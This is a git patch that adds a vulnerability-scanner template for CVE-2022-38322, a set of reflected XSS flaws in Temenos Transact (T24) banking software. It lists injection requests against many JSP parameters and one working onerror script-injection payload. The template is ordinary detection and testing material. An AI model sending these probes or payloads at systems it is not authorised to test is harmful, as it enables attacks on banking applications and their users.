From b53d585dc5c9eb90d9386ecc8c201b9fd3aab652 Mon Sep 17 00:00:00 2001
From: Ashraf Harb <ashrafharb997@gmail.com>
Date: Thu, 1 Jan 1970 00:00:00 +0000
Subject: [PATCH] Added template for CVE-2022-38322

---
 CVE-2022-38322.yaml | 40 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 CVE-2022-38322.yaml

diff --git a/CVE-2022-38322.yaml b/CVE-2022-38322.yaml
new file mode 100644
index 0000000000..0c5e885069
--- /dev/null
+++ b/CVE-2022-38322.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-38322
+
+info:
+  name: Multiple Reflected XSS in Temenos Transact (Previously T24)
+  author: qotoz
+  severity: high
+  tags: xss, transact, t24 , temenos
+  reference:
+    - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jsps/enqrequest.jsp?enqaction=XSS&enqname=XSS&routineArgs=XSS&skin=XSS&compId=XSS&usrRole=XSS&compScreen=XSS&contextRoot=&windowName=XSS&user=XSS&reqTabid=XSS&WS_replaceAll=XSS&WS_parentComposite=XSS&command=&formToken="
+      - "{{BaseURL}}/jsps/about.jsp?skin=XSS&release=XSS"
+      - "{{BaseURL}}/jsps/continue.jsp?cfwstage=XSS&compId=XSS&skin=XSS&user=XSS&windowName=XSS"
+      - "{{BaseURL}}/jsps/customMessage.jsp?Message=XSS"
+      - "{{BaseURL}}/jsps/dropdown.jsp?title=XSS&routineArgs=XSS&routineName=XSS&searchCriteria=XSS&dropfield=XSS&compId=XSS&usrRole=XSS&skin=XSS&windowName=XSS&parentWin=XSS"
+      - "{{BaseURL}}/jsps/fileUpload.jsp?skin=XSS&trans_upload=XSS&trans_uploading=XSS&fragment=XSS"
+      - "{{BaseURL}}/jsps/genDocRequest.jsp?imageId=XSS&isPopUp=XSS&enqid=XSS"
+      - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS"
+      - "{{BaseURL}}/jsps/submitWindow.jsp?requestType=XSS&routineArgs=XSS&companyId=XSS&unlock=XSS&closing=XSS&pwprocessid=XSS&windowName=XSS"
+      - "{{BaseURL}}/jsps/svgInstall.jsp?skin=XSS"
+      - "{{BaseURL}}/jsps/txnrequest.jsp?usrRole=XSS&routineArgs=XSS&compId=XSS&compScreen=XSS&user=XSS&skin=XSS"
+      - "{{BaseURL}}/jsps/genrequest.jsp?routineName=XSS&routineArgs=XSS&skin=XSS&compId=XSS&compScreen=XSS&contextRoot=&user=XSS&formToken="
+      - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS%27)%22+onerror=%22confirm(%27XSS%27)%22+test=%22"
+
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "XSS"
+        part: body 
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file